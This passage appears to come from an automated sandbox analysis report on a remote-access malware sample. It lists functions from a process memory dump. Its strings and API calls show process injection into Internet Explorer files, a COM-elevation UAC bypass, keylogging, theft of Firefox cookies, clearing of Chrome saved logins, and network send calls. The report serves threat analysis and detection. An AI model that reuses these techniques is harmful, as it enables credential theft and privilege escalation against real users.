                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                          • API String ID: 3756808967-1743721670
                                                          • Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                          • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                          • Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
                                                          • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                          Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                                          • API String ID: 0-1861860590
                                                          • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                          • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                          • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                          • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                          Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00407521
                                                          • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                          • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                          • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                          • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                          Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                          • GetLastError.KERNEL32 ref: 0041A7BB
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
                                                          • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                          • Opcode Fuzzy Hash: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
                                                          • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                          Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID: lJD$lJD$lJD
                                                          • API String ID: 745075371-479184356
                                                          • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                          • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                          • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                          • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                          Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                          • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                          • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 1164774033-405221262
                                                          • Opcode ID: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
                                                          • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                          • Opcode Fuzzy Hash: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
                                                          • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                          Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                          • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                          • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                          • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                          Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: 8SG$PXG$PXG$NG$PG
                                                          • API String ID: 341183262-3812160132
                                                          • Opcode ID: 39ed380a9ec6d75c479dc2136c407cfaea9131db2767e6191ba47839baeebabf
                                                          • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                          • Opcode Fuzzy Hash: 39ed380a9ec6d75c479dc2136c407cfaea9131db2767e6191ba47839baeebabf
                                                          • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                          Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 0040A416
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                          • GetKeyState.USER32(00000010), ref: 0040A433
                                                          • GetKeyboardState.USER32(?), ref: 0040A43E
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID:
                                                          • API String ID: 1888522110-0
                                                          • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                          • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                          • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                          • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                          Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: a5a2435d701e7c66ff87935dcc82d73a1a8b771ae99b2717fd575abfdacf1bcf
                                                          • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                          • Opcode Fuzzy Hash: a5a2435d701e7c66ff87935dcc82d73a1a8b771ae99b2717fd575abfdacf1bcf
                                                          • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                          Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00449212
                                                          • _free.LIBCMT ref: 00449236
                                                          • _free.LIBCMT ref: 004493BD
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                          • _free.LIBCMT ref: 00449589
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 314583886-0
                                                          • Opcode ID: 77d567d986389793b8f06509abc4f32cf47dab0ee2822006b3a3c569a4cbc8d8
                                                          • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                          • Opcode Fuzzy Hash: 77d567d986389793b8f06509abc4f32cf47dab0ee2822006b3a3c569a4cbc8d8
                                                          • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                          Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                            • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                            • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                            • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                            • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-2876530381
                                                          • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                          • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                          • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                          • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                          Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                          • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP$['E
                                                          • API String ID: 2299586839-2532616801
                                                          • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                          • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                          • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                          • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                          Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                          • GetLastError.KERNEL32 ref: 0040BA58
                                                          Strings
                                                          • UserProfile, xrefs: 0040BA1E
                                                          • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                          • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                          • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                          • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                          Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                          • GetLastError.KERNEL32 ref: 0041799D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                          • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                          • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                          • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                          Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00409258
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00F780A0,00000010), ref: 004048E0
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                          • FindClose.KERNEL32(00000000), ref: 004093C1
                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                          • FindClose.KERNEL32(00000000), ref: 004095B9
                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                          • String ID:
                                                          • API String ID: 1824512719-0
                                                          • Opcode ID: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
                                                          • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                          • Opcode Fuzzy Hash: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
                                                          • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                          Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
